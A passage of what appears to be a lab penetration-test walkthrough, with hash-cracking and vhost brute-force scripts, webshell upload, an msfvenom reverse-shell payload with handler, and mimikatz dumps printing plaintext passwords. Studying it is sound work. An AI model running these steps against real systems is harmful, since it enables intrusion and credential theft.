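<p>Before sending a recovered hash to a third-party lookup service such as somd5, which discloses the hash to that service and may simply not know the value, a local check costs nothing. The script below is an added example, not part of the original write-up: it infers the digest algorithm from the hex length (40 hex characters is the size of SHA-1, as here; 32 would be MD5) and tries each candidate algorithm over a word list. The hash from the log above is the target constant; the word list is constructed for the example, and whether the hash really is the SHA-1 of <code>web123</code> is answered by running the block as is.</p>

```python
import hashlib

# Hash recovered from the ThinkPHP log above (40 hex characters)
TARGET_HASH = "74c774ef39b5b977c1fd59dbfc73c3e380a65aa3"

# Unsalted single-round digests, keyed by hex length; ThinkPHP 3.x applications
# commonly store plain md5() or sha1() of the password, so these are the first to try
BY_HEX_LENGTH = {
    32: ["md5"],
    40: ["sha1"],
    56: ["sha224"],
    64: ["sha256"],
    96: ["sha384"],
    128: ["sha512"],
}

# Constructed word list; on a real engagement feed rockyou or a target-specific list
SAMPLE_WORDLIST = ["123456", "admin", "password", "web123", "webhack123"]


def identify_hash(hexdigest):
    """Return candidate algorithms for a hex digest, or [] if the string is not hex."""
    h = hexdigest.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return []
    return BY_HEX_LENGTH.get(len(h), [])


def crack_hash(hexdigest, wordlist):
    """Try every candidate algorithm over the word list; return (algorithm, word) or None."""
    h = hexdigest.strip().lower()
    for algo in identify_hash(h):
        for word in wordlist:
            if hashlib.new(algo, word.encode("utf-8")).hexdigest() == h:
                return algo, word
    return None


if __name__ == "__main__":
    print("candidate algorithms:", identify_hash(TARGET_HASH))
    print("result:", crack_hash(TARGET_HASH, SAMPLE_WORDLIST))
```

<p>If the local pass finds nothing, hashcat mode 100 (SHA-1) with a real word list and rules is the next step; an online lookup is the last resort, not the first, because the hash itself is client data.</p>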
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.55pt;margin-left:-.25pt;">
<a name="_Toc21051"></a><span lang="EN-US">3.8. </span><span><span style="font-family:黑体;font-weight:normal;">Binding </span><span lang="EN-US">hosts </span></span><span><span style="font-family:黑体;font-weight:normal;">to brute-force the admin back-end subdomain</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:1.75pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">If directory scanning still does not turn up the back-end, try binding </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">hosts </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">entries and brute-forcing candidate subdomains against the IP (virtual-host collision).</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.9pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Someone recently published a script for this at </span><span lang="EN-US"><a href="https://github.com/fofapro/Hosts_scan"><span style="color:blue;font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">https://github.com/fofapro/Hosts_scan</span></a></span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">. It did not quite fit my needs, so I made a small change: it now loads a </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">top3K </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">subdomain list automatically and brute-forces every name against the </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">IP</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">. The modified script:</span><span lang="EN-US"></span>
</p>
<pre style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;margin-left:-.25pt;">
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#Author:R3start
# A small tool that matches IP addresses against candidate host names (virtual-host collision)

import requests
import re

lists = []
files = open('hosts_ok.txt', 'w+')

# read the IP addresses
print("==================================== Starting matching ====================================")
for iplist in open("ip.txt"):
    ip = iplist.strip('\n')
    # read the host names: every prefix in top3kdomain.txt is combined with every base domain in host.txt
    #http_s = ['http://','https://']
    http_s = ['http://']
    for h in http_s:
        for d in open("top3kdomain.txt", 'r'):  # moonsec
            d = d.strip('\n')
            for hostlist in open("host.txt", 'r'):
                host = d + "." + hostlist.strip('\n')
                # the request goes to the IP; the Host header carries the candidate name
                headers = {'Host': host, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'}
                try:
                    r = requests.session()
                    requests.packages.urllib3.disable_warnings()
                    rhost = r.get(h + ip, verify=False, headers=headers, timeout=5)
                    rhost.encoding = 'utf-8'
                    # page title; a page without &lt;title&gt; is still a valid answer, not a failure
                    m = re.search('&lt;title&gt;(.*)&lt;/title&gt;', rhost.text)
                    title = m.group(1) if m else ''
                    info = '%s -- %s protocol: %s size: %d title: %s' % (ip, host, h, len(rhost.text), title)
                    lists.append(info)
                    files.write(info + "\n")
                    print(info)
                except Exception:
                    error = ip + " --- " + host + " --- request failed!~"
                    print(error)
files.close()
print("==================================== Matched list ====================================")
for i in lists:
    print(i)
</pre>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Since the target does not use </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">https</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">, the collision test can be run over </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">http </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">only.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<img width="553" height="329" src="https://www.2k8.org/content/uploadfile/202203/17/7d655e2d.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:5.7pt;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<img width="553" height="244" src="https://www.2k8.org/content/uploadfile/202203/17/69833577.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:4.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">admin.webhack123.com </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">is the back-end address.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:25.15pt;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
<img width="553" height="261" src="https://www.2k8.org/content/uploadfile/202203/17/4bec0b44.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
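<p>The modified Hosts_scan script above reports every name that returns a page, which on a server with a catch-all default vhost is every name, so the real hit has to be picked out of the output by eye. The Python below is an added example (neither the author's script nor the Hosts_scan project's code): it sends each candidate Host header to the IP, fingerprints the response by status, size and title, and reports only names whose fingerprint differs from that of a random non-existent host, i.e. from the server's default vhost. The IP 192.168.0.100, the <code>fake_server</code> stand-in and its page titles are constructed so the block runs offline; on a real target use <code>http_fetch</code> and feed it top3kdomain.txt.</p>

```python
import re
import uuid
import urllib.error
import urllib.request

UA = ("Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36")


def http_fetch(url, host, timeout=5):
    """Send the request to the IP in `url` with the Host header set to `host`.

    This is what a hosts-file entry achieves, without editing /etc/hosts per guess.
    Returns (status, body); non-2xx answers are returned rather than raised, because
    a 401 or 403 from an admin vhost is still a hit.
    """
    req = urllib.request.Request(url, headers={"Host": host, "User-Agent": UA})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", errors="replace")


def fake_server(url, host):
    """Constructed stand-in for the target: one admin vhost, every other name gets the default site."""
    if host == "admin.webhack123.com":
        return 200, "<html><head><title>Admin Login</title></head><body>login form</body></html>"
    return 200, "<html><head><title>Default Site</title></head><body>default page</body></html>"


def page_title(body):
    m = re.search(r"<title>(.*?)</title>", body, re.IGNORECASE | re.DOTALL)
    return m.group(1).strip() if m else ""


def fingerprint(status, body):
    """Cheap response fingerprint used to tell vhosts apart: status, size, title."""
    return (status, len(body), page_title(body))


def collide_hosts(ip, domain, subdomains, fetch=http_fetch, scheme="http"):
    """Brute-force `<sub>.<domain>` Host headers against `ip`.

    A random host name that cannot exist is requested first; the server answers it
    with its default vhost, and only candidates whose fingerprint differs from that
    baseline are reported. This removes the false positives a catch-all vhost
    produces when every name returns 200.
    """
    url = f"{scheme}://{ip}/"
    baseline = fingerprint(*fetch(url, f"{uuid.uuid4().hex}.{domain}"))
    hits = []
    for sub in subdomains:
        host = f"{sub}.{domain}"
        try:
            fp = fingerprint(*fetch(url, host))
        except Exception:  # timeouts and resets: no answer for this name
            continue
        if fp != baseline:
            hits.append({"host": host, "status": fp[0], "size": fp[1], "title": fp[2]})
    return {"baseline": baseline, "hits": hits}


if __name__ == "__main__":
    # Real run: collide_hosts("192.168.0.100", "webhack123.com",
    #                         open("top3kdomain.txt").read().split())
    result = collide_hosts("192.168.0.100", "webhack123.com",
                           ["www", "admin", "mail"], fetch=fake_server)
    print("default vhost:", result["baseline"])
    for hit in result["hits"]:
        print(hit)
```

<p>One caveat: the default vhost itself (often <code>www</code>) is by construction identical to the baseline and is never listed, which is fine because it is the site already in hand. A server that varies a response by nonce or timestamp will defeat the size comparison; drop <code>len(body)</code> from the fingerprint in that case and compare on status and title alone.</p>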
<h2 style="margin-top:0cm;margin-right:180.7pt;margin-bottom:13.55pt;margin-left:-.25pt;line-height:259%;">
<a name="_Toc21052"></a><span lang="EN-US">3.9. </span><span><span style="font-family:黑体;font-weight:normal;">Back-end captcha logic flaw</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:259%;margin-bottom:13.55pt;margin-left:-.25pt;margin-right:180.7pt;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:259%;">Because the captcha check is flawed, the login password can be brute-forced.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:44.3pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="554" height="481" src="https://www.2k8.org/content/uploadfile/202203/17/0ad53366.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-left:-.25pt;">
<a name="_Toc21053"></a><span lang="EN-US">3.10. </span><span><span style="font-family:黑体;font-weight:normal;">Changing the permitted upload file types to get a </span><span lang="EN-US">webshell</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:18.85pt;margin-left:21.25pt;margin-right:-19.35pt;margin-top:0cm;">
<img width="553" height="391" src="https://www.2k8.org/content/uploadfile/202203/17/02fba6cb.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:74.7pt;margin-left:22.8pt;margin-right:-12.6pt;margin-top:0cm;">
<img width="542" height="184" src="https://www.2k8.org/content/uploadfile/202203/17/e584a7f4.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h1 style="margin-top:0cm;margin-right:0cm;margin-bottom:18.0pt;margin-left:-.25pt;">
<a name="_Toc21054"></a><b><span lang="EN-US" style="font-family:Segoe UI,sans-serif;">4. metasploit </span></b>for privilege escalation and information gathering<span lang="EN-US"></span>
</h1>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.55pt;margin-left:-.25pt;">
<a name="_Toc21055"></a><span lang="EN-US">4.1. </span><span><span style="font-family:黑体;font-weight:normal;">Generating the payload</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:1.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">The <span lang="EN-US">phpstudy</span> bundle runs with system-level privileges by default, so uploading an <span lang="EN-US">exe</span> through the webshell and executing it directly yields a high-privilege session.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:110%;margin-bottom:3.15pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:9.0pt;line-height:110%;">msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.127 lport=12345 -f exe >s.exe</span><span lang="EN-US"></span>
</p>
<h2 style="margin-left:-.25pt;">
<a name="_Toc21056"></a><span lang="EN-US">4.2. </span><span><span style="font-family:黑体;font-weight:normal;">Listening for the callback</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">The first <span lang="EN-US">use</span> line misspells the module name and fails; the second loads it. The handler must use the same payload, LHOST and LPORT that msfvenom was given.</span><span lang="EN-US"></span>
</p>
<pre style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;margin-left:-.25pt;">
msf5 > use exploit/multi/hander
[-] No results from search
[-] Failed to load module: exploit/multi/hander
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.127
lhost => 192.168.0.127
msf5 exploit(multi/handler) > set lport 12345
lport => 12345
msf5 exploit(multi/handler) > exploit
</pre>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:7.05pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
<img width="553" height="51" src="https://www.2k8.org/content/uploadfile/202203/17/8fc139c5.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:2.0pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Check which account the session runs as:</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">meterpreter > getuid</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:23.35pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Server username: WEB\Administrator</span><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:12.95pt;margin-left:-.25pt;">
<a name="_Toc21057"></a><span lang="EN-US">4.3. migrate: </span><span><span style="font-family:黑体;font-weight:normal;">process migration</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">Use <span lang="EN-US">migrate</span> to move the session into a 64-bit process. Here <span lang="EN-US">migrate 592</span> moves it into a process running as <span lang="EN-US">SYSTEM</span>, which makes the later steps (credential dumping, routing) easier. The PID is specific to this host: list processes with <span lang="EN-US">ps</span> first and pick a stable 64-bit <span lang="EN-US">NT AUTHORITY\SYSTEM</span> process (a long-lived service process rather than something a user may close), because the session dies together with the process it lives in.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:42.75pt;margin-left:22.8pt;margin-right:-21.4pt;margin-top:0cm;">
<img width="553" height="89" src="https://www.2k8.org/content/uploadfile/202203/17/a0599b87.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-left:-.25pt;">
<a name="_Toc21058"></a><span lang="EN-US">4.4. mimikatz: </span><span><span style="font-family:黑体;font-weight:normal;">dumping hashes and plaintext passwords</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:5.45pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">meterpreter > load mimikatz<br />
meterpreter > wdigest<br />
[+] Running as SYSTEM<br />
[*] Retrieving wdigest credentials<br />
wdigest credentials<br />
===================</span><span lang="EN-US"></span>
</p>
<table border="0" cellpadding="0" cellspacing="0" width="540" style="border-collapse:collapse;font-family:等线;font-size:10.5pt;width:404.85pt;" class="ke-zeroborder">
<tbody>
<tr>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">AuthID</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">Package</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">Domain</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">User</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">Password</span></td>
</tr>
<tr>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">0;46514</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">NTLM</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US"> </span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US"> </span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US"> </span></td>
</tr>
<tr>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">0;997</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">Negotiate</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">NT AUTHORITY</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">LOCAL SERVICE</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US"> </span></td>
</tr>
<tr>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">0;558301</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">NTLM</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">WEB</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">Administrator</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">!@#Qwe456</span></td>
</tr>
<tr>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">0;996</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">Negotiate</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">HACKBOX</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">WEB$</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">@tB]xH/ka*ZmmIFokG1qiX#A#_ucF^NfcV9*ry"o$sfC)qN<br />%SA+]DvRq@htb.=_Mf;g?(N3y$:e5j[h5g#VngdcT'Ku92U TG^$cLzCnSIhw</span></td>
</tr>
<tr>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">0;999</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">Negotiate</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">HACKBOX</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">WEB$</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">@tB]xH/ka*ZmmIFokG1qiX#A#_ucF^NfcV9*ry"o$sfC)qN<br />%SA+]DvRq@htb.=_Mf;g?(N3y$:e5j[h5g#VngdcT'Ku92U TG^$cLzCnSIhw</span></td>
</tr>
</tbody>
</table>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:5.45pt;margin-left:-.25pt;margin-right:0cm;margin-top:16.6pt;text-indent:-.5pt;">
<span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">meterpreter > tspkg<br />
[+] Running as SYSTEM<br />
[*] Retrieving tspkg credentials<br />
tspkg credentials<br />
=================</span><span lang="EN-US"></span>
</p>
<table border="0" cellpadding="0" cellspacing="0" width="540" style="border-collapse:collapse;font-family:等线;font-size:10.5pt;width:404.85pt;" class="ke-zeroborder">
<tbody>
<tr>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">AuthID</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">Package</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">Domain</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">User</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">Password</span></td>
</tr>
<tr>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">0;996</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">Negotiate</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">HACKBOX</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">WEB$</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US"> </span></td>
</tr>
<tr>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">0;46514</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">NTLM</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US"> </span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US"> </span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US"> </span></td>
</tr>
<tr>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">0;997</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">Negotiate</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">NT AUTHORITY</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">LOCAL SERVICE</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US"> </span></td>
</tr>
<tr>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">0;999</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">Negotiate</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">HACKBOX</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">WEB$</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US"> </span></td>
</tr>
<tr>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">0;558301</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">NTLM</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">WEB</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">Administrator</span></td>
<td valign="top" style="padding:0cm 5.4pt 0cm 0cm;"><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;">!@#Qwe456</span></td>
</tr>
</tbody>
</table>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:8.0pt;margin-left:-.25pt;margin-right:0cm;margin-top:8.0pt;text-indent:-.5pt;">
<span style="font-family:宋体;font-size:10.5pt;line-height:112%;">The output shows the <span lang="EN-US">HACKBOX</span> domain (the machine account <span lang="EN-US">WEB$</span> is logged on to it) and the local administrator of the <span lang="EN-US">WEB</span> host, <span lang="EN-US">WEB\Administrator</span>, with the password <span lang="EN-US">!@#Qwe456</span>. The <span lang="EN-US">WEB$</span> value is the computer account password; it is not an interactive credential, although its NT hash can still authenticate to the DC as the computer.</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:20.0pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
